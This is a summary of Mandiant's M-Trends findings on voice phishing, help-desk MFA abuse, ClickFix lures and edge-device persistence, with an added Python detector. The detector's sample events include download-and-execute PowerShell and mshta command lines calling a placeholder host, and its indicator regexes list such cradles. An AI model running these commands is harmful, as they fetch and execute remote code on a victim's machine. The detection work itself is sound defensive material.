Smooth criminals talking their way into cloud environments, Google says
Summary
Google Cloud’s Mandiant reports that voice-based phishing surged in 2025, becoming the second-most common initial access vector overall and the top tactic used in cloud break-ins. Interactive social engineering — callers steering conversations in real time — has proven highly effective, particularly against IT help desks where attackers register devices for MFA or request password resets. The M-Trends analysis shows voice phishing accounted for about 11% of successful intrusions, while exploitation of vulnerabilities remained the most common vector at 32%. Traditional, non-interactive email phishing declined to around 6%.
The report also highlights two other worrying trends: a rise in ClickFix-style lures that trick users into pasting and running attacker-supplied commands themselves, and extremes in attacker timelines. Some intrusions involve rapid hand-offs, with access gained by one actor passed to a ransomware or extortion group in under 30 seconds, while other campaigns show extreme stealth: actors living on edge devices (firewalls, routers, VPN appliances) remain undetected for hundreds of days, with some investigations reporting average dwell times approaching 393 days.
Key Points
- Voice phishing rose to 11% of initial access vectors in 2025 and is the top method for cloud environment break-ins.
- Exploiting vulnerabilities remains the leading initial access method (32%).
- Non-interactive phishing (emails) declined to about 6% of intrusions.
- Interactive social engineering targets IT help desks to register attacker devices for MFA or reset credentials.
- ClickFix attacks — tricking users into running harmful commands — spiked and were widely used by access-for-sale operations.
- Rapid ‘hand-offs’ can move access from initial intruder to ransomware gangs in under 30 seconds, demanding machine-speed responses.
- ‘Living on the edge’ sees attackers exploit edge devices to persist, intercept traffic and harvest credentials, producing dwell times measured in hundreds of days.
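Two of the points above describe concrete, detectable sequences: a help-desk password reset followed by a new MFA device enrolled on the same account, and a script host spawned from the Run dialog with a download-and-execute command line (ClickFix). The block below is an added example written for this summary, not code from Mandiant or the M-Trends report. The audit-event and process-event schemas, the 30-minute window, the parent/child process sets and the command-line indicator regexes are all assumptions to be mapped onto your own identity-provider logs and EDR telemetry; the sample events are constructed.

```python
"""Added example: detection logic for two of the patterns in the Key Points.
Illustrative code written for this summary, not from Mandiant or M-Trends.
Event schemas, field names, thresholds and indicator regexes are assumptions."""
from datetime import datetime, timedelta
import re

# --- 1. Help-desk reset followed by a new MFA device from an unfamiliar IP ---

# Constructed identity-provider audit events (hypothetical schema, UTC ISO 8601).
IDP_EVENTS = [
    {"ts": "2025-03-04T09:00:00", "actor": "helpdesk.alice", "target": "bob",
     "action": "password_reset", "ip": "10.0.5.20"},
    {"ts": "2025-03-04T09:03:30", "actor": "bob", "target": "bob",
     "action": "mfa_method_registered", "ip": "198.51.100.7"},
    {"ts": "2025-03-04T09:04:10", "actor": "bob", "target": "bob",
     "action": "login", "ip": "198.51.100.7"},
    {"ts": "2025-03-04T11:00:00", "actor": "carol", "target": "carol",
     "action": "login", "ip": "10.0.8.3"},
    {"ts": "2025-03-05T14:20:00", "actor": "helpdesk.alice", "target": "dave",
     "action": "password_reset", "ip": "10.0.5.20"},
    {"ts": "2025-03-05T16:45:00", "actor": "dave", "target": "dave",
     "action": "mfa_method_registered", "ip": "10.0.8.9"},
]


def find_helpdesk_mfa_abuse(events, window=timedelta(minutes=30)):
    """Return (target, reset_ts, register_ts, ip) for every password reset done
    on behalf of another user that is followed within `window` by a new MFA
    method registered on that account from an IP the account never used
    before the reset. The 30-minute window is an assumed tuning value."""
    events = sorted(events, key=lambda e: e["ts"])  # ISO 8601 sorts lexically
    hits = []
    for i, ev in enumerate(events):
        if ev["action"] != "password_reset" or ev["actor"] == ev["target"]:
            continue  # self-service resets are not the help-desk pattern
        t0 = datetime.fromisoformat(ev["ts"])
        known_ips = {x["ip"] for x in events[:i] if x["actor"] == ev["target"]}
        for later in events[i + 1:]:
            if datetime.fromisoformat(later["ts"]) - t0 > window:
                break  # events are sorted, nothing further can be in-window
            if (later["target"] == ev["target"]
                    and later["action"] == "mfa_method_registered"
                    and later["ip"] not in known_ips):
                hits.append((ev["target"], ev["ts"], later["ts"], later["ip"]))
    return hits


# --- 2. ClickFix-style execution: user pastes a command into the Run dialog ---

# The Win+R Run dialog is hosted by explorer.exe, so a script host spawned
# directly from it with a download-and-execute command line is the shape that
# ClickFix lures produce. Both sets and the regexes are assumptions to tune.
CLICKFIX_PARENTS = {"explorer.exe"}
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
CLICKFIX_INDICATORS = [
    (r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b", "download cradle"),
    (r"(?i)\b(iex|invoke-expression)\b", "in-memory execution"),
    (r"(?i)-(e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{8,}", "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\bmshta(\.exe)?\s+https?://", "mshta remote payload"),
]

# Constructed process-creation events (hypothetical EDR schema).
PROC_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm https://example.invalid/x | iex"'},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://example.invalid/a.hta"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File deploy.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell"},
]


def classify_clickfix(event):
    """Return the names of matched indicators, or [] if the process does not fit
    the ClickFix shape (wrong parent, wrong child, or no suspicious arguments)."""
    if event["parent"].lower() not in CLICKFIX_PARENTS:
        return []
    if event["image"].lower() not in CLICKFIX_CHILDREN:
        return []
    return [name for pat, name in CLICKFIX_INDICATORS
            if re.search(pat, event["cmdline"])]


if __name__ == "__main__":
    for hit in find_helpdesk_mfa_abuse(IDP_EVENTS):
        print("help-desk reset -> new MFA device:", hit)
    for ev in PROC_EVENTS:
        print(ev["image"], "from", ev["parent"], "->", classify_clickfix(ev) or "clean")
```

Run against the constructed events, only bob's account trips the first rule (dave's MFA enrolment is hours after the reset, outside the window), and only the two explorer.exe-spawned processes with remote-fetch arguments trip the second. The first rule deliberately keys on "IP never seen for this account before the reset" rather than on geography, because the caller who talked the help desk into the reset is enrolling from their own machine, not the victim's.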
Context and relevance
This Mandiant/M-Trends insight matters because it shows a shift from mass, low-effort email campaigns to high-touch, interactive social engineering that targets human fallibility, especially help desks, and cloud admin workflows. It also underlines the growing importance of securing edge devices: when attackers compromise firewalls or VPN appliances they sit in the traffic path, stay invisible to the endpoint tooling that never runs on those appliances, and can harvest credentials or data without ever needing to move deeper into the network. For security teams, that means automated detection fast enough to act inside a seconds-long hand-off window, help-desk procedures that verify callers out of band before any password reset or MFA device enrolment (and treat a reset followed by a new MFA device as an alert rather than routine), and hardening of edge infrastructure and MFA workflows.
Industry trends this ties into: wider use of social-engineering-as-a-service, rising commoditisation of initial access, and an ongoing arms race where defenders must respond at machine speed to seconds-long attack life cycles. The findings also reinforce the need for zero-trust controls, rigorous logging and telemetry, and proactive patching of edge devices.
Why should I read this?
Because if you think phishing is just sketchy emails you’re behind the curve. These are slick, live phone scams and clever ClickFix ruses that are getting criminals into people’s accounts and cloud environments. Read it to know where attackers are actually getting in so you can stop them before they hand access off to the ransom crew.
Author style
Punchy: this isn’t a dry trendline — it’s a wake-up call. If you run cloud infrastructure or a help desk, this analysis is directly relevant and worth digging into so you can tighten processes and automation now.
